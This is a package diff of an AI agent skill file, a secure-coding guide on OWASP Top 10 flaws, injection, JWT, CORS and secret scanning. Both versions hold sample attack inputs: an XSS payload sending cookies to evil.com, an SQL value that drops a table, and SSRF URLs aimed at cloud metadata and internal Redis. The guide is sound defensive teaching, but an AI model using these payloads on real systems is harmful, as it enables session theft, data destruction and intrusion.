tribunal-kit 3.0.0 → 4.0.0

package/.agent/skills/vulnerability-scanner/SKILL.md

@@ -1,269 +1,354 @@
----
-name: vulnerability-scanner
-description: Security vulnerability analysis mastery. OWASP Top 10 (2025), injection attacks (SQL, XSS, SSRF, command), authentication/authorization flaws, dependency vulnerabilities, secret scanning, CORS misconfiguration, supply chain attacks, and security headers. Use when auditing security, reviewing code for vulnerabilities, or hardening applications.
-allowed-tools: Read, Write, Edit, Glob, Grep
-version: 2.0.0
-last-updated: 2026-04-01
-applies-to-model: gemini-2.5-pro, claude-3-7-sonnet
----
-
-# Vulnerability Scanner — Security Analysis Mastery
-
-> Every input is hostile. Every dependency is a liability. Every secret is one commit from exposure.
-> Security is not a feature — it's a constraint on every line of code you write.
-
----
-
-## OWASP Top 10 (2025)
-
-```
-A01  Broken Access Control         → Missing authorization checks
-A02  Cryptographic Failures        → Weak encryption, exposed secrets
-A03  Injection                     → SQL, XSS, command, LDAP
-A04  Insecure Design               → Missing threat modeling
-A05  Security Misconfiguration     → Default credentials, verbose errors
-A06  Vulnerable Components         → Outdated dependencies
-A07  Authentication Failures       → Weak passwords, missing MFA
-A08  Data Integrity Failures       → Untrusted deserialization, missing SRI
-A09  Logging & Monitoring Failures → No audit trail, alert blindness
-A10  SSRF                          → Server-side request forgery
-```
-
----
-
-## Injection Attacks
-
-### SQL Injection
-
-```typescript
-// ❌ VULNERABLE: String interpolation in SQL
-const query = `SELECT * FROM users WHERE email = '${email}'`;
-// Attack: email = "'; DROP TABLE users; --"
-
-// ✅ SAFE: Parameterized queries
-const result = await db.query("SELECT * FROM users WHERE email = $1", [email]);
-
-// ✅ SAFE: ORM (Prisma, Drizzle)
-const user = await prisma.user.findUnique({ where: { email } });
-
-// ❌ HALLUCINATION TRAP: Template literals are NOT parameterized
-// ❌ db.query(`SELECT * FROM users WHERE id = ${id}`);  ← VULNERABLE
-// ✅ db.query("SELECT * FROM users WHERE id = $1", [id]); ← SAFE
-```
-
-### XSS (Cross-Site Scripting)
-
-```typescript
-// ❌ VULNERABLE: innerHTML with user input
-element.innerHTML = userComment;
-// Attack: userComment = "<script>document.location='https://evil.com?c='+document.cookie</script>"
-
-// ✅ SAFE: textContent (no HTML parsing)
-element.textContent = userComment;
-
-// React auto-escapes by default — BUT:
-// ❌ VULNERABLE in React:
-<div dangerouslySetInnerHTML={{ __html: userInput }} />  // bypasses escaping
-
-// ✅ SAFE in React:
-<div>{userInput}</div>  // auto-escaped
-
-// Content Security Policy (defense in depth)
-// Add HTTP header:
-// Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self'
-```
-
-### SSRF (Server-Side Request Forgery)
-
-```typescript
-// ❌ VULNERABLE: fetching user-provided URLs
-app.get("/proxy", async (req, res) => {
-  const data = await fetch(req.query.url).then(r => r.text());
-  res.send(data);
-});
-// Attack: url = "http://169.254.169.254/latest/meta-data/" (AWS metadata)
-// Attack: url = "http://localhost:6379/" (internal Redis)
-
-// ✅ SAFE: Allowlist of domains
-const ALLOWED_HOSTS = new Set(["api.example.com", "cdn.example.com"]);
-
-app.get("/proxy", async (req, res) => {
-  const url = new URL(req.query.url as string);
-  if (!ALLOWED_HOSTS.has(url.hostname)) {
-    return res.status(403).json({ error: "Domain not allowed" });
-  }
-  // Additional: block private IP ranges
-  const ip = await dns.resolve4(url.hostname);
-  if (isPrivateIP(ip[0])) {
-    return res.status(403).json({ error: "Private IP not allowed" });
-  }
-  const data = await fetch(url).then(r => r.text());
-  res.send(data);
-});
-```
-
----
-
-## Authentication & Authorization
-
-```typescript
-// JWT Best Practices
-import jwt from "jsonwebtoken";
-
-// ✅ SAFE: Specify algorithm explicitly
-const token = jwt.sign(payload, SECRET, {
-  algorithm: "HS256",    // explicit
-  expiresIn: "15m",      // short-lived access token
-  issuer: "myapp",
-});
-
-// ✅ SAFE: Verify with explicit algorithms
-const decoded = jwt.verify(token, SECRET, {
-  algorithms: ["HS256"], // MUST specify — prevents algorithm confusion attack
-  issuer: "myapp",
-});
-
-// ❌ HALLUCINATION TRAP: jwt.verify() without algorithms option is VULNERABLE
-// ❌ jwt.verify(token, SECRET);  ← accepts ANY algorithm including "none"
-// ✅ jwt.verify(token, SECRET, { algorithms: ["HS256"] });
-
-// Authorization: check BEFORE business logic
-app.delete("/api/posts/:id", async (req, res) => {
-  const post = await getPost(req.params.id);
-  if (!post) return res.status(404).json({ error: "Not found" });
-
-  // ✅ Authorization check BEFORE delete
-  if (post.authorId !== req.user.id && req.user.role !== "admin") {
-    return res.status(403).json({ error: "Forbidden" });
-  }
-
-  await deletePost(post.id);
-  res.status(204).send();
-});
-```
-
----
-
-## Dependency Security
-
-```bash
-# Check for known vulnerabilities
-npm audit                    # built-in
-npx snyk test                # Snyk (more comprehensive)
-npx socket check             # Socket.dev (supply chain)
-
-# Auto-fix
-npm audit fix
-
-# lock file integrity
-# ✅ Commit package-lock.json / pnpm-lock.yaml
-# ✅ Use npm ci in CI (not npm install)
-# ✅ Pin exact versions for critical dependencies
-# ✅ Enable Dependabot or Renovate for auto-updates
-```
-
-```
-Supply chain attack vectors:
-1. Typosquatting     → "recat" instead of "react"
-2. Maintainer hijack → compromised npm account
-3. Dependency confusion → private package name exists on public registry
-4. Malicious postinstall → runs arbitrary code on npm install
-5. Abandoned packages  → unmaintained, no security patches
-
-Defense:
-- Review new dependencies before adding
-- Use npm audit in CI (fail on high severity)
-- Pin versions, review lockfile diffs
-- Use --ignore-scripts for untrusted packages
-```
-
----
-
-## Security Headers
-
-```typescript
-import helmet from "helmet";
-
-app.use(helmet()); // Sets secure defaults
-
-// Key headers set by helmet:
-// Content-Security-Policy    → Controls resource loading
-// X-Content-Type-Options     → Prevents MIME sniffing (nosniff)
-// X-Frame-Options            → Prevents clickjacking (DENY)
-// Strict-Transport-Security  → Forces HTTPS (HSTS)
-// X-XSS-Protection           → Legacy XSS filter (deprecated, CSP is better)
-// Referrer-Policy             → Controls referrer header
-
-// CORS — never wildcard in production
-app.use(cors({
-  origin: ["https://myapp.com", "https://admin.myapp.com"],
-  methods: ["GET", "POST", "PUT", "DELETE"],
-  credentials: true,
-}));
-
-// ❌ HALLUCINATION TRAP: origin: "*" disables CORS protection entirely
-// ❌ cors({ origin: "*" })  ← allows any website to call your API
-// ✅ cors({ origin: ["https://myapp.com"] })  ← whitelist specific domains
-```
-
----
-
-## Secret Scanning
-
-```
-Secrets that MUST be in environment variables:
-- Database connection strings
-- API keys (Stripe, SendGrid, etc.)
-- JWT signing secrets
-- OAuth client secrets
-- Encryption keys
-
-Detection tools:
-- git-secrets (pre-commit hook)
-- TruffleHog / detect-secrets (scan history)
-- GitHub secret scanning (automatic)
-- GitGuardian (enterprise)
-
-If a secret is committed:
-1. IMMEDIATELY rotate the secret (new key/password)
-2. Remove from git history (BFG Repo-Cleaner or git-filter-repo)
-3. Force-push cleaned history
-4. Audit access logs for the compromised secret
-5. Post-incident review
-```
-
----
-
-## 🤖 LLM-Specific Traps
-
-1. **Template Literals for SQL:** `\`SELECT * FROM users WHERE id = ${id}\`` is SQL injection. Use parameterized queries.
-2. **`dangerouslySetInnerHTML` Without Sanitization:** React's escape valve for XSS. Never use with user input.
-3. **`jwt.verify()` Without `algorithms`:** Without specifying algorithms, JWT accepts "none" — bypasses all verification.
-4. **CORS `origin: "*"`:** Wildcard CORS disables protection. Always allowlist specific domains.
-5. **Authorization After Business Logic:** Check permissions BEFORE executing the action, not after.
-6. **`npm install` in CI:** Use `npm ci` for deterministic, lockfile-based installs. `npm install` can change lockfile.
-7. **Hardcoded Secrets in Source:** Secrets in code are in git history forever. Use environment variables.
-8. **SSRF Via User URLs:** Never fetch user-provided URLs without domain allowlisting and private IP blocking.
-9. **Missing Rate Limiting on Auth:** Login endpoints without rate limiting enable brute-force attacks.
-10. **Verbose Error Messages in Production:** Stack traces in API responses expose internal implementation details.
-
----
-
-## 🏛️ Tribunal Integration
-
-**Slash command: `/tribunal-backend` or `/audit`**
-
-### ✅ Pre-Flight Self-Audit
-
-```
-✅ Are all SQL queries parameterized (no string interpolation)?
-✅ Is user input sanitized before rendering (no innerHTML)?
-✅ Does JWT verify specify algorithms explicitly?
-✅ Is CORS configured with specific origins (not wildcard)?
-✅ Are authorization checks BEFORE business logic?
-✅ Are all secrets in environment variables (not source code)?
-✅ Is `npm ci` used in CI (not `npm install`)?
-✅ Are security headers configured (helmet)?
-✅ Is rate limiting enabled on auth endpoints?
-✅ Are error messages generic in production (no stack traces)?
-```
+---
+name: vulnerability-scanner
+description: Security vulnerability analysis mastery. OWASP Top 10 (2025), injection attacks (SQL, XSS, SSRF, command), authentication/authorization flaws, dependency vulnerabilities, secret scanning, CORS misconfiguration, supply chain attacks, and security headers. Use when auditing security, reviewing code for vulnerabilities, or hardening applications.
+allowed-tools: Read, Write, Edit, Glob, Grep
+version: 3.1.0
+last-updated: 2026-04-06
+applies-to-model: gemini-2.5-pro, claude-3-7-sonnet
+---
+
+# Vulnerability Scanner — Security Analysis Mastery
+
+---
+
+## OWASP Top 10 (2025)
+
+```
+A01  Broken Access Control         → Missing authorization checks
+A02  Cryptographic Failures        → Weak encryption, exposed secrets
+A03  Injection                     → SQL, XSS, command, LDAP
+A04  Insecure Design               → Missing threat modeling
+A05  Security Misconfiguration     → Default credentials, verbose errors
+A06  Vulnerable Components         → Outdated dependencies
+A07  Authentication Failures       → Weak passwords, missing MFA
+A08  Data Integrity Failures       → Untrusted deserialization, missing SRI
+A09  Logging & Monitoring Failures → No audit trail, alert blindness
+A10  SSRF                          → Server-side request forgery
+```
+
+---
+
+## Injection Attacks
+
+### SQL Injection
+
+```typescript
+// ❌ VULNERABLE: String interpolation in SQL
+const query = `SELECT * FROM users WHERE email = '${email}'`;
+// Attack: email = "'; DROP TABLE users; --"
+
+// ✅ SAFE: Parameterized queries
+const result = await db.query("SELECT * FROM users WHERE email = $1", [email]);
+
+// ✅ SAFE: ORM (Prisma, Drizzle)
+const user = await prisma.user.findUnique({ where: { email } });
+
+// ❌ HALLUCINATION TRAP: Template literals are NOT parameterized
+// ❌ db.query(`SELECT * FROM users WHERE id = ${id}`);  ← VULNERABLE
+// ✅ db.query("SELECT * FROM users WHERE id = $1", [id]); ← SAFE
+```
+
+### XSS (Cross-Site Scripting)
+
+```typescript
+// ❌ VULNERABLE: innerHTML with user input
+element.innerHTML = userComment;
+// Attack: userComment = "<script>document.location='https://evil.com?c='+document.cookie</script>"
+
+// ✅ SAFE: textContent (no HTML parsing)
+element.textContent = userComment;
+
+// React auto-escapes by default — BUT:
+// ❌ VULNERABLE in React:
+<div dangerouslySetInnerHTML={{ __html: userInput }} />  // bypasses escaping
+
+// ✅ SAFE in React:
+<div>{userInput}</div>  // auto-escaped
+
+// Content Security Policy (defense in depth)
+// Add HTTP header:
+// Content-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self'
+```
+
+### SSRF (Server-Side Request Forgery)
+
+```typescript
+// ❌ VULNERABLE: fetching user-provided URLs
+app.get("/proxy", async (req, res) => {
+  const data = await fetch(req.query.url).then(r => r.text());
+  res.send(data);
+});
+// Attack: url = "http://169.254.169.254/latest/meta-data/" (AWS metadata)
+// Attack: url = "http://localhost:6379/" (internal Redis)
+
+// ✅ SAFE: Allowlist of domains
+const ALLOWED_HOSTS = new Set(["api.example.com", "cdn.example.com"]);
+
+app.get("/proxy", async (req, res) => {
+  const url = new URL(req.query.url as string);
+  if (!ALLOWED_HOSTS.has(url.hostname)) {
+    return res.status(403).json({ error: "Domain not allowed" });
+  }
+  // Additional: block private IP ranges
+  const ip = await dns.resolve4(url.hostname);
+  if (isPrivateIP(ip[0])) {
+    return res.status(403).json({ error: "Private IP not allowed" });
+  }
+  const data = await fetch(url).then(r => r.text());
+  res.send(data);
+});
+```
+
+---
+
+## Authentication & Authorization
+
+```typescript
+// JWT Best Practices
+import jwt from "jsonwebtoken";
+
+// ✅ SAFE: Specify algorithm explicitly
+const token = jwt.sign(payload, SECRET, {
+  algorithm: "HS256",    // explicit
+  expiresIn: "15m",      // short-lived access token
+  issuer: "myapp",
+});
+
+// ✅ SAFE: Verify with explicit algorithms
+const decoded = jwt.verify(token, SECRET, {
+  algorithms: ["HS256"], // MUST specify — prevents algorithm confusion attack
+  issuer: "myapp",
+});
+
+// ❌ HALLUCINATION TRAP: jwt.verify() without algorithms option is VULNERABLE
+// ❌ jwt.verify(token, SECRET);  ← accepts ANY algorithm including "none"
+// ✅ jwt.verify(token, SECRET, { algorithms: ["HS256"] });
+
+// Authorization: check BEFORE business logic
+app.delete("/api/posts/:id", async (req, res) => {
+  const post = await getPost(req.params.id);
+  if (!post) return res.status(404).json({ error: "Not found" });
+
+  // ✅ Authorization check BEFORE delete
+  if (post.authorId !== req.user.id && req.user.role !== "admin") {
+    return res.status(403).json({ error: "Forbidden" });
+  }
+
+  await deletePost(post.id);
+  res.status(204).send();
+});
+```
+
+---
+
+## Dependency Security
+
+```bash
+# Check for known vulnerabilities
+npm audit                    # built-in
+npx snyk test                # Snyk (more comprehensive)
+npx socket check             # Socket.dev (supply chain)
+
+# Auto-fix
+npm audit fix
+
+# lock file integrity
+# ✅ Commit package-lock.json / pnpm-lock.yaml
+# ✅ Use npm ci in CI (not npm install)
+# ✅ Pin exact versions for critical dependencies
+# ✅ Enable Dependabot or Renovate for auto-updates
+```
+
+```
+Supply chain attack vectors:
+1. Typosquatting     → "recat" instead of "react"
+2. Maintainer hijack → compromised npm account
+3. Dependency confusion → private package name exists on public registry
+4. Malicious postinstall → runs arbitrary code on npm install
+5. Abandoned packages  → unmaintained, no security patches
+
+Defense:
+- Review new dependencies before adding
+- Use npm audit in CI (fail on high severity)
+- Pin versions, review lockfile diffs
+- Use --ignore-scripts for untrusted packages
+```
+
+---
+
+## Security Headers
+
+```typescript
+import helmet from "helmet";
+
+app.use(helmet()); // Sets secure defaults
+
+// Key headers set by helmet:
+// Content-Security-Policy    → Controls resource loading
+// X-Content-Type-Options     → Prevents MIME sniffing (nosniff)
+// X-Frame-Options            → Prevents clickjacking (DENY)
+// Strict-Transport-Security  → Forces HTTPS (HSTS)
+// X-XSS-Protection           → Legacy XSS filter (deprecated, CSP is better)
+// Referrer-Policy             → Controls referrer header
+
+// CORS — never wildcard in production
+app.use(cors({
+  origin: ["https://myapp.com", "https://admin.myapp.com"],
+  methods: ["GET", "POST", "PUT", "DELETE"],
+  credentials: true,
+}));
+
+// ❌ HALLUCINATION TRAP: origin: "*" disables CORS protection entirely
+// ❌ cors({ origin: "*" })  ← allows any website to call your API
+// ✅ cors({ origin: ["https://myapp.com"] })  ← whitelist specific domains
+```
+
+---
+
+## Secret Scanning
+
+```
+Secrets that MUST be in environment variables:
+- Database connection strings
+- API keys (Stripe, SendGrid, etc.)
+- JWT signing secrets
+- OAuth client secrets
+- Encryption keys
+
+Detection tools:
+- git-secrets (pre-commit hook)
+- TruffleHog / detect-secrets (scan history)
+- GitHub secret scanning (automatic)
+- GitGuardian (enterprise)
+
+If a secret is committed:
+1. IMMEDIATELY rotate the secret (new key/password)
+2. Remove from git history (BFG Repo-Cleaner or git-filter-repo)
+3. Force-push cleaned history
+4. Audit access logs for the compromised secret
+5. Post-incident review
+```
+
+---
+
+---
+
+## Security Checklists
+
+---
+
+### OWASP Top 10 Audit Checklist
+
+#### A01: Broken Access Control
+- [ ] Authorization on all protected routes
+- [ ] Deny by default
+- [ ] Rate limiting implemented
+- [ ] CORS properly configured
+
+#### A02: Cryptographic Failures
+- [ ] Passwords hashed (bcrypt/argon2, cost 12+)
+- [ ] Sensitive data encrypted at rest
+- [ ] TLS 1.2+ for all connections
+- [ ] No secrets in code/logs
+
+#### A03: Injection
+- [ ] Parameterized queries
+- [ ] Input validation on all user data
+- [ ] Output encoding for XSS
+- [ ] No eval() or dynamic code execution
+
+#### A04: Insecure Design
+- [ ] Threat modeling done
+- [ ] Security requirements defined
+- [ ] Business logic validated
+
+#### A05: Security Misconfiguration
+- [ ] Unnecessary features disabled
+- [ ] Error messages sanitized
+- [ ] Security headers configured
+- [ ] Default credentials changed
+
+#### A06: Vulnerable Components
+- [ ] Dependencies up to date
+- [ ] No known vulnerabilities
+- [ ] Unused dependencies removed
+
+#### A07: Authentication Failures
+- [ ] MFA available
+- [ ] Session invalidation on logout
+- [ ] Session timeout implemented
+- [ ] Brute force protection
+
+#### A08: Integrity Failures
+- [ ] Dependency integrity verified
+- [ ] CI/CD pipeline secured
+- [ ] Update mechanism secured
+
+#### A09: Logging Failures
+- [ ] Security events logged
+- [ ] Logs protected
+- [ ] No sensitive data in logs
+- [ ] Alerting configured
+
+#### A10: SSRF
+- [ ] URL validation implemented
+- [ ] Allow-list for external calls
+- [ ] Network segmentation
+
+---
+
+### Authentication Checklist
+
+- [ ] Strong password policy
+- [ ] Account lockout
+- [ ] Secure password reset
+- [ ] Session management
+- [ ] Token expiration
+- [ ] Logout invalidation
+
+---
+
+### API Security Checklist
+
+- [ ] Authentication required
+- [ ] Authorization per endpoint
+- [ ] Input validation
+- [ ] Rate limiting
+- [ ] Output sanitization
+- [ ] Error handling
+
+---
+
+### Data Protection Checklist
+
+- [ ] Encryption at rest
+- [ ] Encryption in transit
+- [ ] Key management
+- [ ] Data minimization
+- [ ] Secure deletion
+
+---
+
+### Security Headers
+
+|Header|Purpose|
+|--------|---------|
+|**Content-Security-Policy**|XSS prevention|
+|**X-Content-Type-Options**|MIME sniffing|
+|**X-Frame-Options**|Clickjacking|
+|**Strict-Transport-Security**|Force HTTPS|
+|**Referrer-Policy**|Referrer control|
+
+---
+
+### Quick Audit Commands
+
+|Check|What to Look For|
+|-------|------------------|
+|Secrets in code|password, api_key, secret|
+|Dangerous patterns|eval, innerHTML, SQL concat|
+|Dependency issues|npm audit, snyk|
+
+---
+
+**Usage:** Copy relevant checklists into your PLAN.md or security report.